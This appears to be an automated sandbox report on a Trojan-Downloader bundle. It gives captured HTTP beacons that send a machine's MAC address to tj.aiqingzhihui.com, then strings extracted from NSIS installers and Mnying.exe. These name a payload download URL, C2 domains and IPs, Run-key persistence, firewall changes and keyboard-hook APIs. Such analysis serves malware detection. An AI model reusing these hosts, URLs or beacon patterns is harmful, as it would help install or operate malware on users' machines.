GET /tj.php?mac=000C2902CDFB&st=1&exez=pczh_107_306.exe&exef=%original file name%.exe&pass=44683dff641394194c05e3f3ca584214&url1=hXXp://ya.ru/&url2=ya HTTP/1.1
Referer: VVV.aiqingzhihui.com
User-Agent: Mozi11a
Host: tj.aiqingzhihui.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 17:28:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PHP/5.3.24
Set-Cookie: yuyuapi=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
Content-type: text/html
Content-Length: 91
...193.138.244.23120..<meta http-equiv="Content-Type" content="text
/html; charset=utf-8">..HTTP/1.1 200 OK..Date: Fri, 13 Jun 2014 17:
28:39 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: PHP/5.3.24..Set-Co
okie: yuyuapi=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT..Content-
type: text/html..Content-Length: 91.....193.138.244.23120..<meta ht
tp-equiv="Content-Type" content="text/html; charset=utf-8">....



GET /SrcManager/roominfo?cid=693619_1371525642501&rid=null&rd=0.09363483125343919 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; flash)
Cookie: y_id=null
Host: sm.kukuplay.com
Accept-Encoding: gzip


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 17:29:19 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0
X-Upstream-IP: 172.16.18.17:8494
Age: 0
X-Cache: miss
Server: eJxLz8/XS8/RNzUuT0/1BgAfuARs
Content-Encoding: gzip
...........V..LQ.R27522W.Q*.K.M....h~...$....dG.....aJJ.........l3Kc3C
.xCcsCS#S3.#S.C.$N.@.%. ...-,-...M.M.,t...r2..... ^rFbIJj^qfI.....RfqJ
jNjI*...............



GET /adx.php?c=cz02MmI3NTk5ZjZjMTdkY2E3AHQ9MTQwMjY4MDUzOABzZT0xAGJ1PTEAcHJpY2U9VTVzMDJnQUpWTTk3akVwZ1c1SUE4blJ3dWx0ZnZPbGs3Mi1QNkEAY2htZD0xAHY9MQBpPTMyODcwZjY0 HTTP/1.1
Accept: */*
Referer: hXXp://pos.baidu.com/ecom?cec=utf-8&dai=2&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4<r=<u=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680537275&lunum=6&ch=0&at=6&qn=6dc8052231d438f7&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537511&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537511
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: wn.pos.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:00 GMT
Content-Type: image/gif
Content-Length: 49
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
GIF89a...................!.......,...........T..;..



GET /xin/?ver=138 HTTP/1.1
User-Agent: vb   wininet
Host: tj.aiqingzhihui.com


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 17:28:47 GMT
Server: Microsoft-IIS/6.0
Content-Length: 14
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAACACCQC=KGFFPDBBLDGPFHNHNENGKPEJ; path=/
Cache-control: private
<!--tj over-->HTTP/1.1 200 OK..Date: Fri, 13 Jun 2014 17:28:47 G
MT..Server: Microsoft-IIS/6.0..Content-Length: 14..Content-Type: text/
html..Set-Cookie: ASPSESSIONIDAACACCQC=KGFFPDBBLDGPFHNHNENGKPEJ; path=
/..Cache-control: private..<!--tj over-->..



GET /csplayer/csplayer15s0319.aspx HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://resource.ws.kukuplay.com/players/2014/05/23/60130//fengyun.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: resource.m0wscdn.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 19 Mar 2013 07:53:44 GMT
ETag: "51481988-b30f"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
X-Via-Cache: sx
Content-Length: 45839
Accept-Ranges: bytes
Date: Fri, 13 Jun 2014 03:20:32 GMT
Age: 136799
Connection: keep-alive
X-cdn: ydcdn
X-hit-at: sx
FLV........................onMetaData.......stereo....audiosamplesize.
@[email protected][email protected]
[email protected][email protected][email protected].@| .......fil
esize...........audiocodecid.@$........duration...........videocodecid
.@......~.U......>.... ..^.rt.......8_.\.C..KYx.[JJ..b.k....H......
..&..t.......Fw.../A..6..C..Z".~sq..Z*....R...5g..u#.f4....d...i.=.=..
....t@..$...|~.....f..p."[email protected]?..T.../.>.vJz....o..x..}.`\....[v.
..zq[........M...-..l0..XI{-...... Z.@[email protected] .L^z.{).7y..%/.
.wf.6.2r......;s.L.g.3s...LQ...(.L.,.P....o0E.4.o..........h.i...x|...
....5'.jF....[ZZj...Ph.\l.89..^.adb..-....D...X|pt.G.F{G'..W..}..Ky:69
>$........c#...`M................`_....~...h..'..c.........C.....b[
..G{c..P.z_..=./\K'..?..-....wM..p...h.d..d. ...B^.M...N....L.\;2zbD.J
.....X4>.."iG...#.&..b[....)..c4...':....}[email protected]' ..
.......}.:.D>J9......&.C={...n...xt..WJW?..o..:[email protected]...
k.lkm[.RCL...l.-.u..94...8rrr.I<.,...o...P.l.W...H,.{./:tdb.o#y.QzP
.....qOt..3.kxl...Rc.F........<68R3.{..x./.......p^...;.....~...2.\
Q.j..'...'..c....c_.5..x............s....N..=X...]#.."..<..6.Y.;F.H
.Gb..{z....G{.P%z.c... U......66:........~.548.Vj......rV.Ur..s..U.5..
=...Z....(.F!7.P.(3...R........rf8\.Q.LeF'.7.).9]Z"..e.2......N...R,O.
....U....h.f.......%..{WL.p.."N....LW .6......"..!~. K.......|..YDPT,4
<..k.G.cC.........Ud.C.......!.j.Wk....*..sm|t..(.....!...>.z..^
;.|....A*].uLV...#v.......6f...[..8..:...j..X,..;9........N8:(....
<<< skipped >>>






The Trojan-Downloader connects to the servers at the folowing location(s):







%original file name%.exe_348:




.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
http://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
\LOCALS~1\Temp\nsp3.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp3.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp3.tmp
.reloc
System.dll
callback%d
WS2_32.dll
NSISdl.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
xmlns:exif='http://ns.adobe.com/exif/1.0/'>
xmlns:pdf='http://ns.adobe.com/pdf/1.3/'>
xmlns:photoshop='http://ns.adobe.com/photoshop/1.0/'>
xmlns:tiff='http://ns.adobe.com/tiff/1.0/'>
xmlns:xap='http://ns.adobe.com/xap/1.0/'>
Adobe Photoshop CS Windows
xmlns:stRef='http://ns.adobe.com/xap/1.0/sType/ResourceRef#'
xmlns:xapMM='http://ns.adobe.com/xap/1.0/mm/'>
uuid:87eafc22-2a39-11e3-88a4-cfba1abf9dae
adobe:docid:photoshop:87eafc21-2a39-11e3-88a4-cfba1abf9dae
adobe:docid:photoshop:4cc79e37-2a3a-11e3-88a4-cfba1abf9dae
xmlns:dc='http://purl.org/dc/elements/1.1/'>
hK.iq
nsp3.tmp
_619.exe
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp3.tmp
%original file name%.exe
c:\%original file name%.exe
%Program Files%\125
S~1\Temp\nsp3.tmp\1227415
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Program Files%\kele
goodpic_dae_619.exe
http://souhu.1htb.cn/goodpic_dae_619.zip
Nullsoft Install System v2.45
%Documents and Settings%\%current user%\Desktop\2345
360.cn
2014.06.11.175618
360sd.exe

%original file name%.exe_348_rwx_10004000_00001000:




callback%d

tjjrfx_70745.exe_456:




.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
$.psP
6`%U'B
:[email protected]
8%8X8]8d8
9$:*:7:?:
7%7x7
:);|;(<7<
? ?(?0?8?
7 7$7(7,7074787<7
8$9(9<9@9
Thawte Certification1
http://ocsp.thawte.com0
.http://crl.thawte.com/ThawteTimestampingCA.crl0
http://ts-ocsp.ws.symantec.com07
 http://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
 http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
.Class 3 Public Primary Certification Authority0
http://crl.verisign.com/pca3.crl0
https://www.verisign.com/cps0
#http://logo.verisign.com/vslogo.gif04
http://ocsp.verisign.com0>
Dhttp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
n.aAHu
2Terms of use at https://www.verisign.com/rpa (c)101.0,
2Beijing baidu Netcom science and technology co.ltd1>0<
2Beijing baidu Netcom science and technology co.ltd0
/http://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
https://www.verisign.com/rpa0
http://ocsp.verisign.com0;
/http://csc3-2010-aia.verisign.com/CSC3-2010.cer0
https://www.verisign.com/cps0*
#http://crl.verisign.com/pca3-g5.crl04
http://ocsp.verisign.com0
BBB.DDD
Nullsoft Install System v2.46.5-Unicode
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
unpacking data: %d%%
... %d%%
http://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
dm\LOCALS~1\Temp\nsi6.tmp\tmppm4bkx.dll
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi6.tmp\tmppm4bkx.dll
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi6.tmp
Nullsoft Install System v2.46.5-Unicode
%Program Files%\
si6.tmp
p\tmppm4bkx.dll"
~1\Temp\nsi6.tmp\tmppm4bkx.dll
%Program Files%\Baidu\BaiduAn\install.log
:\Program Files\kele\tjjrfx_70745.exe"
"%Program Files%\kele\tjjrfx_70745.exe"
%Program Files%\Baidu\BaiduAn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi6.tmp
%Program Files%\kele
tjjrfx_70745.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst4.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Program Files%\kele\tjjrfx_70745.exe
621413027
1.0.284.627

Mnying.exe_1992:




.text
`.itext
`.data
.idata
.rdata
@.reloc
B.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
%s[%d]
%s_%d
USER32.DLL
EInvalidGraphicOperation
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
uxtheme.dll
DWMAPI.DLL
UrlMon
shell32.dll
PasswordCharx)D
OnKeyDownd
OnKeyPress
OnKeyUp`
clWebSnow
clWebFloralWhite
clWebLavenderBlush
clWebOldLace
clWebIvory
clWebCornSilk
clWebBeige
clWebAntiqueWhite
clWebWheat
clWebAliceBlue
clWebGhostWhite
clWebLavender
clWebSeashell
clWebLightYellow
clWebPapayaWhip
clWebNavajoWhite
clWebMoccasin
clWebBurlywood
clWebAzure
clWebMintcream
clWebHoneydew
clWebLinen
clWebLemonChiffon
clWebBlanchedAlmond
clWebBisque
clWebPeachPuff
clWebTan
clWebYellow
clWebDarkOrange
clWebRed
clWebDarkRed
clWebMaroon
clWebIndianRed
clWebSalmon
clWebCoral
clWebGold
clWebTomato
clWebCrimson
clWebBrown
clWebChocolate
clWebSandyBrown
clWebLightSalmon
clWebLightCoral
clWebOrange
clWebOrangeRed
clWebFirebrick
clWebSaddleBrown
clWebSienna
clWebPeru
clWebDarkSalmon
clWebRosyBrown
clWebPaleGoldenrod
clWebLightGoldenrodYellow
clWebOlive
clWebForestGreen
clWebGreenYellow
clWebChartreuse
clWebLightGreen
clWebAquamarine
clWebSeaGreen
clWebGoldenRod
clWebKhaki
clWebOliveDrab
clWebGreen
clWebYellowGreen
clWebLawnGreen
clWebPaleGreen
clWebMediumAquamarine
clWebMediumSeaGreen
clWebDarkGoldenRod
clWebDarkKhaki
clWebDarkOliveGreen
clWebDarkgreen
clWebLimeGreen
clWebLime
clWebSpringGreen
clWebMediumSpringGreen
clWebDarkSeaGreen
clWebLightSeaGreen
clWebPaleTurquoise
clWebLightCyan
clWebLightBlue
clWebLightSkyBlue
clWebCornFlowerBlue
clWebDarkBlue
clWebIndigo
clWebMediumTurquoise
clWebTurquoise
clWebCyan
clWebPowderBlue
clWebSkyBlue
clWebRoyalBlue
clWebMediumBlue
clWebMidnightBlue
clWebDarkTurquoise
clWebCadetBlue
clWebDarkCyan
clWebTeal
clWebDeepskyBlue
clWebDodgerBlue
clWebBlue
clWebNavy
clWebDarkViolet
clWebDarkOrchid
clWebMagenta
clWebDarkMagenta
clWebMediumVioletRed
clWebPaleVioletRed
clWebBlueViolet
clWebMediumOrchid
clWebMediumPurple
clWebPurple
clWebDeepPink
clWebLightPink
clWebViolet
clWebOrchid
clWebPlum
clWebThistle
clWebHotPink
clWebPink
clWebLightSteelBlue
clWebMediumSlateBlue
clWebLightSlateGray
clWebWhite
clWebLightgrey
clWebGray
clWebSteelBlue
clWebSlateBlue
clWebSlateGray
clWebWhiteSmoke
clWebSilver
clWebDimGray
clWebMistyRose
clWebDarkSlateBlue
clWebDarkSlategray
clWebGainsboro
clWebDarkGray
clWebBlack
Proportional
OnExecuteP
{43826d1e-e718-42ee-bc55-a1e261c37bfe}
comctl32.dll
AutoHotkeys
TMenuH%D
Uh.FD
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
UhÎ
imm32.dll
OnExecute8
OnExecute
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
tagMSG
GlassFrame.Bottom
GlassFrame.Enabled
GlassFrame.Left
GlassFrame.Right
GlassFrame.SheetOfGlass
GlassFrame.Top
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
User32.dll
%s, ClassID: %s
%s, ProgID: "%s"
ole32.dll
CoXMLHTTPRequest
olepro32.dll
%d.%d.%d.%d
ftp://
login error
http://
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
HTTP/1.1
grfKeyState
TComTargetExecEvent
CmdGroup
nCmdID
nCmdexecopt
hhctrl.ocx
URLMON.DLL
SHDOCLC.DLL
IWebBrowser
IWebBrowserAppX
IWebBrowser2
TEWBWindowSetResizable
TEWBWindowSetLeft
TEWBWindowSetTop
TEWBWindowSetWidth
TEWBWindowSetHeight
bstrUrlContext
bstrUrl
OnWindowSetResizable
OnWindowSetLeft
OnWindowSetTopD
OnWindowSetWidth
OnWindowSetHeight
EWebBrokerExceptionU
PSAPI.dll
TAsyncExecuteThreadU
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Down\ETagFile.dat
HNetCfg.FwMgr
HNetCfg.FwAuthorizedApplication
%d.%d
Shell.Application
Shell32.dll
SysShadow
Content-Type: application/x-www-form-urlencoded
var x = document.createElement("link");x.rel = "stylesheet";x.type = "text/css";x.media = "screen";x.href = "
document.getElementsByTagName("head")[0].appendChild(x);
scrollbar.css
TSimpleUdpClient
D:\project\Component\superobjectv1.2.4\superobject.pas
Unsuported variant data type: %d
STcpThread
tjj.mny8.cn
tjjwt.mny8.cn
tjjdx.mny8.cn
tjjt.mny8.cn
125.43.78.107
tjj.mnyb.net
222.88.93.109
IWebBrowserApp
IWebBrowser2
TWebBrowserStatusTextChange
TWebBrowserProgressChange
TWebBrowserCommandStateChange
TWebBrowserTitleChange
TWebBrowserPropertyChange
TWebBrowserBeforeNavigate2
TWebBrowserNewWindow2
TWebBrowserNavigateComplete2
TWebBrowserDocumentComplete
TWebBrowserOnVisible
TWebBrowserOnToolBar
TWebBrowserOnMenuBar
TWebBrowserOnStatusBar
TWebBrowserOnFullScreen
TWebBrowserOnTheaterMode
TWebBrowserWindowSetResizable
TWebBrowserWindowSetLeft
TWebBrowserWindowSetTop
TWebBrowserWindowSetWidth
TWebBrowserWindowSetHeight
TWebBrowserWindowClosing
TWebBrowserClientToHostWindow
TWebBrowserSetSecureLockIcon
TWebBrowserFileDownload
TWebBrowserNavigateError
%TWebBrowserPrintTemplateInstantiation
TWebBrowserPrintTemplateTeardown
TWebBrowserUpdatePageStatus
%TWebBrowserPrivacyImpactedStateChange
TWebBrowser
TWebBrowsert
OnWindowSetResizablel
OnWindowSetTop
OnWindowSetWidthH
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
ou.mny8.com.cn
ou.mnyb.net
222.88.93.108
125.43.78.118
MAPI32.DLL
Uh.yJ
supports
importNode
gdiplus.dll
GdiplusShutdown
user32.dll
OnActionExecutex
rcmDefault
rcmDebug
DontExecuteScripts
DontExecuteJava
DontExecuteActiveX
DisableUrlIfEncodingUTF8
EnableUrlIfEncodingUTF8
CheckFontSupportsCodePage
DisableSubmitUrlInUTF8
EnableSubmitUrlInUTF8
lpMsg
PMsg
pguidCmdGroup
TTranslateUrlEvent
pchURLIn
ppchURLOut
CmdID
pszUrl
pszUrlContext
szPassWord
ErrorUrl
OptionKeyPath
OverrideOptionKeyPath
OnTranslateUrl
OnCommandExec
'%s' is not supported.
WebocPopupManagement
ValidateNavigateUrl
HttpUsernamePasswordDisable
GetUrlDomFilePathUnencoded
XmlHttp
https://
AppEvents\Schemes\Apps\Explorer\Navigating\.Current
.Current
\ieframe.dll
\shdocvw.dll
\StringFileInfo\%0.4x%0.4x\%s
TMsgEvent
TKeyEventEx
Port
Password
poPortrait
OnKeyDownt
OnKeyUp
0.750000
3333333
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)(
EmbeddedWB http://bsalsa.com/
TOnPaintWebICOEvent
ScrollLeftPic<
OnPaintWebICO<
LinkUrl<
Fav%d.dat
Setup.ini
TFormLoginTips
LoginUrl
/WebShell
CMD:Login
CMD:Reg
CMD:Logout:
CMD:Close
Uh.IM
UnsupportedGdiplusVersion
PropertyNotSupported
aclBurlyWood
rpcrt4.dll
KERNEL32.DLL
GetDeskTopIcoPositionX64.exe
mvyy.exe
dtk.vsnis.com
lbldi.dat
Heatbeat.ini
acdat.dat
%ProgramFiles%\Internet Explorer\iexplore.exe
edi.dat
http://udd.mny8.com.cn:4518/tj?qid=
http://udd.mnyb.net:4518/tj?qid=
http://125.43.78.117:4518/tj?qid=
http://222.88.93.101:4518/tj?qid=
runa.ini
FormKeyPress
lblUrl
http://web.mny8.com/Handler/Handler.ashx?action=like&id=
http://web.mny8.com/fav.aspx?id=
favicon.ico
TMonochromeLookup
uWebBrowser
lblURL
lblURLClick
lblURLMouseEnter
lblURLMouseLeave
http://soft.mny8.com
TFormWebShow
frmWebShow
ShowWebForm:
TFormWebShow WebNavParms.URL:
TFormWebShow.wb1 not HandleAllocated
Act_Loginx
Act_MaxExecute
Act_MinExecute
Act_HomePageExecute
Act_ShowTrayExecute
Act_CloseExecute
Act_AboutExecute
Act_CloseOrTrayExecute
Act_CheckUpdateExecute
Act_AutoRunExecute
Act_ShowUserPnlExecute
Act_LoginExecute
Act_RegExecute
Act_RechargeExecute
Act_RefExecute
edtSearchKeyPress
http://www.mny8.com
http://web.mny8.com/Recharge.aspx
http://www.baidu.com
http://web.mny8.com/index.html?action=search&keyword=
/WebShell
/WebShell2
btns.js
http://web.mny8.com/json/btns1/btns.js
http://web.mny8.com/renwu.html?uid=
WMOpenWebUrl
http://web.mny8.com/json/task/task.js
TFormWebShowOnly
frmWebShowOnly
pTipsType:%d
ShellExecute
username=%s&taskid=%s&action=taskok
MnyingU.exe
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetKeyboardType
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutNameA
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
EnumChildWindows
ActivateKeyboardLayout
gdi32.dll
SetViewportOrgEx
version.dll
WinExec
GetCPInfo
CreatePipe
RegQueryInfoKeyA
RegFlushKey
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
wininet.dll
InternetOpenUrlA
HttpSendRequestA
HttpQueryInfoA
HttpOpenRequestA
HttpAddRequestHeadersA
ShellExecuteExA
ShellExecuteW
ShellExecuteA
comdlg32.dll
wsock32.dll
ws2_32.dll
iphlpapi.dll
msvcrt.dll
GdipGetStringFormatHotkeyPrefix
GdipSetStringFormatHotkeyPrefix
GdipSetImageAttributesColorKeys
winmm.dll
4"4-4?4_4
? ?(?0?8?@?
4(424@4}4
=$=2=6=~=
=0>4>8><>
< <$<(<,<0<4<8<<<@<
6 6$6(6,6
>">&>*>.>
1"3&3*3.32363:3
1-282F2i2p2}2
1&1.161`1
='> >3>7><>
2 2(20282@2
3 3$3(3,3034383
6%6u6
3!3%3,3~3
8#8(8-8|8
5!6(6/666=6
9#: :/:4:
=">&>*>0>
4 4$4(4,4044484<4
; ;$;(;,;0;4;8;<;
stdole2.tlbWWW
:WebShell
mUrlsWWW
ShowWebFormW
TaUrl
urlW
licourlWW
-ShowUrlW
OpenUrlW
KeyW
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
.KBx=
.QaQU@q
K1j=%d
%fq'A
hf%ub
8%FqS
.JmgL
n.UZt
eK0%D
jt%xR
b%xhE
KWindows
USimpleTcp
7USimpleUdpClient
?HTTPApp
>WebConst
lfrmLoginTips
uMsgFilter
frmUserLogin
UPipeTransConst
UPipeTransClient
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
PNGImage.Data
iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
Picture.Data
6z%ug
%uI"Q?
FormLoginTips
diTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>        nWqU
Z.xeX`
%uB9oj
" id="W5M0MpCehiHzreSzNTczkc9d"?>        $
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
DialogBoxes.DisableAll
PrintOptions.Margins.Left
PrintOptions.Margins.Right
PrintOptions.Margins.Top
PrintOptions.Margins.Bottom
PrintOptions.HTMLHeader.Strings
PrintOptions.Orientation
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
%.fE 
Constraints.MinHeight
Constraints.MinWidth
" id="W5M0MpCehiHzreSzNTczkc9d"?>        &V
" id="W5M0MpCehiHzreSzNTczkc9d"?>        T
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
TFormUserLogin
FormUserLogin
30]%S
EÞ,
Z.czN
Ce%x'x
.xCn>
.cx!Y
T.yj1
xZ<.ad
imgLoginBottom
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
?
btnLogin
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
btnLoginClick
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
lblQQLogin
lblQQLoginClick
lblQQLoginMouseEnter
lblQQLoginMouseLeave
edtRePass
edtPassKeyPress
edtUserKeyPress
edtPass
FormWebShow
DisableErrors.fpExceptions
HTMLCode.Strings
BtnImage.Data
BgPic.Data
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
FormWebShowOnly
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
PicBtnLeft.Data
PicBtnRight.Data
TabPic.Data
ScrollLeftPic.Data
ScrollRightPic.Data
CloseBtnPic.Data
MenuBtnPic.Data
NewBtnPic.Data
Act_Login
version="11.0.2902.10471"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
http://www.w3.org/2001/XMLSchema
errorUrl
{surl}
loginurl
keyword
{"key":"
TFORMLOGINTIPS
TFORMUSERLOGIN
TFORMWEBSHOW
TFORMWEBSHOWONLY
,Unsupported Application Extension block size
Unknown GIF block type'Object type not supported for operation
Unsupported PixelFormat
Invalid stream operation
Invalid extension introducerúiled to allocate memory for GIF DIB
Invalid Image trailerAInternal error: Extension Instance does not match Extension Label/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s=Error decoding URL style (%%XX) encoded string at position ÑInvalid URL encoded character (%s) at position %d&Cannot change the size of a JPEG image
JPEG error #%d
